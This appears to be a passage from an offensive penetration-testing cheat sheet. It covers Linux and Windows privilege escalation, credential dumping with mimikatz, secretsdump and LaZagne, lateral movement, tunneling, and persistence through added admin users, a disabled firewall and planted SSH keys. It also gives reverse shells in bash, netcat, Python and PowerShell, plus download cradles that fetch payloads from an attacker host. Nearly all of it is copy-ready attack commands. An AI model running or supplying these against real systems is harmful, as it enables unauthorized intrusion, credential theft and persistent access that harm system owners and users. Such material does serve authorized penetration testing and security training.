# SUID/sudo binary calls system("chpasswd") without full path
echo '#!/bin/bash' > /home/<USER>/chpasswd
echo 'bash -i >& /dev/tcp/<ATTACKER>/4444 0>&1' >> /home/<USER>/chpasswd
chmod +x /home/<USER>/chpasswd
export PATH=/home/<USER>:$PATH
./<VULNERABLE_BINARY>

Miscellaneous Linux PrivEsc

ls -la /etc/passwd
echo "root2:$(openssl passwd <PASS>):0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

cat /usr/local/etc/doas.conf
# If: permit nopass <USER> as root cmd service
/usr/local/bin/doas pw group mod wheel -m <USER>
doas su

sudo -l
# If openvpn is available:
sudo openvpn --dev null --script-security 2 --up '/bin/sh -s'
Checklist — Linux PrivEsc
  • sudo -l — GTFOBins for every allowed command
  • SUID binaries — GTFOBins
  • SUID screen 4.5.0 — privesc exploit
  • SUID findfind . -exec /bin/sh -p \; -quit
  • CVE-2021-3156 Baron Samedit
  • CVE-2021-4034 PwnKit
  • Cron jobs — writable scripts — inject; wildcard tar injection
  • Cron PATH hijacking — fake binary in writable directory (e.g. fake tar)
  • pspy to monitor running processes
  • PATH hijacking for sudo/SUID binaries without full paths
  • doas.conf — check for nopasswd entries (FreeBSD)
  • Writable /etc/passwd — append root-equivalent user
  • Running processes handling passwords — gcore <PID> + strings

Credential Dumping

# Password
secretsdump.py '<DOMAIN>/<USER>:<PASS>@<TARGET>'

# Pass-the-Hash
secretsdump.py '<DOMAIN>/<USER>@<TARGET>' -hashes ':<NTHASH>'
Save hives
reg save HKLM\sam      C:\temp\sam.hive
reg save HKLM\security C:\temp\security.hive
reg save HKLM\system   C:\temp\system.hive
Offline dump
secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL

nxc smb <TARGET> -u '<USER>' -p '<PASS>' --sam
nxc smb <TARGET> -u '<USER>' -p '<PASS>' --lsa          # Cleartext AD passwords!
nxc smb <TARGET> -u '<USER>' -p '<PASS>' --local-auth --lsa

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

.\lazagne.exe all

nxc --lsa can return cleartext AD passwords

The LSA secrets store can contain plaintext credentials for service accounts — always run it.

Checklist
  • secretsdump.py remote on every accessible host
  • Registry hive extraction — offline dump
  • nxc --lsa (can reveal cleartext AD passwords!)
  • nxc --sam for local hashes
  • Mimikatz lsadump::secrets + sekurlsa::logonpasswords
  • LaZagne for app credentials

Lateral Movement

evil-winrm-py -i <TARGET> -u '<USER>' -H '<NTHASH>'
psexec.py '<DOMAIN>/<USER>@<TARGET>' -hashes ':<NTHASH>'
nxc smb <TARGET> -u '<USER>' -H '<NTHASH>'

export KRB5CCNAME="$(pwd)/<USER>.ccache"
psexec.py '<DOMAIN>/<USER>@<TARGET>' -k -no-pass -dc-ip <DC_IP>

evil-winrm-py -i <TARGET> -u '<USER>' -p '<PASS>'
evil-winrm-py -i <TARGET> -u '<USER>' -H '<NTHASH>'
psexec.py '<DOMAIN>/<USER>:<PASS>@<TARGET>'
Connect
xfreerdp /u:'<USER>' /p:'<PASS>' /v:<TARGET> /cert:ignore \
  /dynamic-resolution /kbd:layout:0x0000040c \
  /drive:Linux,$(pwd) /scale-desktop:150 +clipboard
Enable RDP remotely via nxc
nxc smb <TARGET> -u '<USER>' -p '<PASS>' -x \
  'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
RunasCs — run as another user
.\RunasCs.exe <USER> <PASS> \
  "C:\temp\nc.exe <ATTACKER> 4444 -e powershell.exe" \
  --bypass-uac -l 8 -t 0

.\RunasCs.exe <USER> <PASS> -d <DOMAIN> \
  "C:\temp\nc.exe <ATTACKER> 4444 -e powershell.exe" \
  --bypass-uac -l 8 -t 0
DCOM MMC20.Application
$dcom = [System.Activator]::CreateInstance(
  [type]::GetTypeFromProgID("MMC20.Application.1", "<TARGET>")
)
$dcom.Document.ActiveView.ExecuteShellCommand(
  "powershell", $null, "powershell -e <B64_SHELL>", "7"
)
Checklist — Lateral Movement
  • Try every set of credentials against all discovered services (SMB, WinRM, RDP, SSH)
  • Pass-the-Hash with all NTLM hashes
  • Pass-the-Ticket if ccache files obtained
  • RunasCs if creds for another user but no direct shell
  • DCOM MMC20.Application if SMB exec fails
  • Enable RDP on high-value targets

Tunneling & Pivoting (Ligolo-ng)

Attacker — start proxy
sudo ./lig-proxy -selfcert -laddr 0.0.0.0:443
Target — upload and run agent
curl -s -o lig-agent.exe http://<ATTACKER>:8000/lig-agent.exe

.\lig-agent.exe -connect <ATTACKER>:443 -ignore-cert   # Windows
./lig-agent -connect <ATTACKER>:443 -ignore-cert        # Linux
Ligolo-ng console commands
session
ifcreate --name pivot1
interface_add_route --name pivot1 --route <INTERNAL_NET>/24
tunnel_start --tun pivot1

# Forward port from internal net back to attacker listener
listener_add --addr <INTERNAL_IP>:<PORT> --to 127.0.0.1:<LOCAL_PORT> --tcp
Sweep ports 1-1024 (no tools needed)
1..1024 | % {
  $c = New-Object Net.Sockets.TcpClient
  $iar = $c.BeginConnect("<PIVOT_TARGET>", $_, $null, $null)
  if ($iar.AsyncWaitHandle.WaitOne(200, $false) -and $c.Connected) {
    $c.EndConnect($iar)
    "TCP port $_ is open"
  }
  $c.Close()
}
Targeted port range sweep
5984..5986 | % {
  $c = New-Object Net.Sockets.TcpClient
  $iar = $c.BeginConnect("<PIVOT_TARGET>", $_, $null, $null)
  if ($iar.AsyncWaitHandle.WaitOne(200, $false) -and $c.Connected) {
    $c.EndConnect($iar)
    "TCP port $_ is open"
  }
  $c.Close()
}
Checklist — Pivoting
  • Set up Ligolo tunnel as soon as first internal host is compromised
  • Route all internal subnets discovered through tunnel
  • Use listener_add to forward reverse shells from deep pivots
  • Scan internal network from attacker machine through tunnel
  • PowerShell port sweep when no tools available

Persistence

Add local admin user
net user pwned P@ssword2026 /add
net localgroup Administrators pwned /add
net localgroup "Remote Management Users" pwned /add
net localgroup "Remote Desktop Users" pwned /add
Enable RDP + allow local PTH
# Enable RDP
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" `
  /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Disable LocalAccountTokenFilterPolicy (allow PTH to local admin)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" `
  /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

# Disable Firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Add SSH authorized key
echo "<YOUR_PUBKEY>" >> /root/.ssh/authorized_keys

Reverse Shells

Netcat
nc.exe <ATTACKER> 4444 -e powershell.exe
nc.exe <ATTACKER> 4444 -e cmd.exe
PowerShell base64
# Generate at https://www.revshells.com
powershell -e <B64_SHELL>
PowerCat
IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER>/powercat.ps1')
powercat -c <ATTACKER> -p 4444 -e powershell
mshta (useful for MSSQL xp_cmdshell / H2 JNI)
mshta http://<ATTACKER>:8000/revshell.hta
cmd via UNC path (no download needed)
cmd.exe /k < \\<ATTACKER>\batchfile.bat
Netcat FIFO
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER> 4444 >/tmp/f
Bash TCP
bash -i >& /dev/tcp/<ATTACKER>/4444 0>&1
Python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

File Transfer

Download methods
curl -s -o <TOOL>.exe http://<ATTACKER>:8000/<TOOL>.exe

certutil -urlcache -f http://<ATTACKER>:8000/<TOOL>.exe C:\temp\<TOOL>.exe

(New-Object System.Net.WebClient).DownloadFile(
  'http://<ATTACKER>:8000/<FILE>', 'C:\temp\<FILE>'
)
Evil-WinRM upload
upload /local/path/to/<FILE>
Download methods
wget http://<ATTACKER>:8000/<FILE> -O /tmp/<FILE>
curl -s -o /tmp/<FILE> http://<ATTACKER>:8000/<FILE>
Attacker HTTP server
python3 -m http.server 8000

# Generate key pair
ssh-keygen -t ed25519 -C '<USER>@target'
cp <USER>.id_ed25519.pub <USER>.id_ed25519.txt

# Upload public key as authorized_keys via REST endpoint
curl -X POST "http://<TARGET>:<PORT>/file-upload" \
  -F "file=@<USER>.id_ed25519.txt" \
  -F "filename=/home/<USER>/.ssh/authorized_keys"

# Connect
ssh -i <USER>.id_ed25519 -p <PORT> <USER>@<TARGET>

Tools Reference

Category Tool Usage
Network nmap Port scan, service detection
Network ligolo-ng Layer-3 tunnel / pivoting
Web feroxbuster Directory brute-force
Web ffuf Parameter fuzzing, content discovery
Web git_dumper.py Dump exposed .git repos
Web exiftool Metadata extraction from PDFs/images
Web whatweb CMS / framework fingerprinting
SMB nxc / netexec SMB/WinRM/RDP/WMI auth, spray, exec
SMB smbclientng Interactive SMB file browsing
Proxy spose.py Port scan through Squid/HTTP proxy
AD kerbrute Username enum + password spray via Kerberos
AD bloodhound-ce-python AD data collection for BloodHound
AD GetUserSPNs.py Kerberoasting
AD GetNPUsers.py ASREPRoasting
AD bloodyAD ACL-based AD attacks, force password change
AD lookupsid.py Domain SID enumeration
AD pygpoabuse.py GPO write — local admin
AD dacledit.py DACL manipulation
AD ticketer.py Golden / Silver ticket generation
AD ntlmrelayx.py NTLM relay attacks
AD ntlm_theft.py Craft NTLM theft files (LNK, etc.)
AD Invoke-Kerberoast.ps1 Windows-side Kerberoasting (no impacket)
Creds secretsdump.py Remote/offline hash dump
Creds mimikatz LSASS dump, LSA secrets, kirbi export
Creds LaZagne Multi-source credential dump
Creds Responder NTLMv2 capture via LLMNR/NBT-NS
Creds kirbi2john.py Convert Kerberos .kirbi ticket to crackable hash
PrivEsc GodPotato SeImpersonate — SYSTEM
PrivEsc RunasCs Run as another user / UAC bypass
PrivEsc FullPowers Restore service account token privileges
PrivEsc SeManageVolumeExploit SeManageVolumePrivilege — SYSTEM file access
PrivEsc pspy Linux process spy (cron detection)
PrivEsc jdwp-shellifier.py JDWP RCE
Cracking hashcat GPU hash cracking
Cracking john CPU hash / key cracking
Cracking ssh2john SSH key — crackable hash
Cracking zip2john ZIP — crackable hash
Cracking keepass2john KeePass — crackable hash
Brute hydra SSH/FTP/HTTP/SMTP/POP3 brute-force
Brute smtp-user-enum SMTP user enumeration
Brute onesixtyone SNMP community string brute
SNMP snmpwalk SNMP walk and enum
SNMP snmp-check SNMP info dump
MSSQL mssqlclient.py MSSQL interactive shell
Remote evil-winrm-py WinRM shell (password / PTH)
Remote psexec.py SMB-based RCE
Remote xfreerdp RDP client
Phishing sendEmail SMTP email sender
Phishing wsgidav (docker) WebDAV server
Payloads msfvenom Payload generation
Payloads powercat PowerShell netcat
Payloads MMG-LO ODT macro generator (LibreOffice shell)
Payloads HTA-Shell mshta-based reverse shell server
DB mongosh MongoDB shell
DB psql PostgreSQL shell

Key reminders

  • Try password reuse everywhere before jumping to complex exploits.
  • Run BloodHound before everything AD-related.
  • Silver Ticket only needs the service account hash — no DA required for MSSQL/CIFS access.
  • If Network/Local Service loses SeImpersonatePrivilege — use FullPowers.exe to restore it, then GodPotato.
  • Always check nxc --lsa — it can leak cleartext AD passwords.